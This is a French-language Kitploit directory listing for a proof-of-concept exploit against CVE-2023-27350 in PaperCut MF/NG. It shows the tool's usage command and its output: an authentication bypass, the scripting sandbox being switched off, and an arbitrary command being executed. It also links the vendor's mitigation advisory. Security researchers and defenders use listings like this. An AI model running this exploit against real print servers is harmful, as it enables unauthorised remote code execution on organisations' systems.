Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-27350 — Vulnérabilité Papercut, les versions concernées sont PaperCut MF ou NG version 8.0 ou ultérieure (à l'exception des versions patchées) sur toutes les plateformes OS. | Kitploit
Outils/GitHubGitHub/royall-researchers/cve-2023-27350
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubroyall-researchers/cve-2023-27350

CVE-2023-27350

Vulnérabilité Papercut, les versions concernées sont PaperCut MF ou NG version 8.0 ou ultérieure (à l'exception des versions patchées) sur toutes les plateformes OS.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 anPas encore vérifié

CVE-2023-27350

POC pour CVE-2023-27350 affectant PaperCut MF/NG

##Versions affectées 'PaperCut MF ou NG version 8.0 ou ultérieure (hors versions corrigées) sur toutes les plateformes OS.'

Résumé

Ce POC utilise une vulnérabilité de contournement d'authentification chaînée avec une utilisation abusive des fonctionnalités de script intégrées pour exécuter du code.

Utilisation

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Atténuations

Mettez à jour vers la dernière version ou atténuez en suivant les instructions dans l'avis de sécurité PaperCut

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

Avertissement

Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de toute utilisation abusive du logiciel. Utilisez-le de manière responsable.

Télécharger l’outil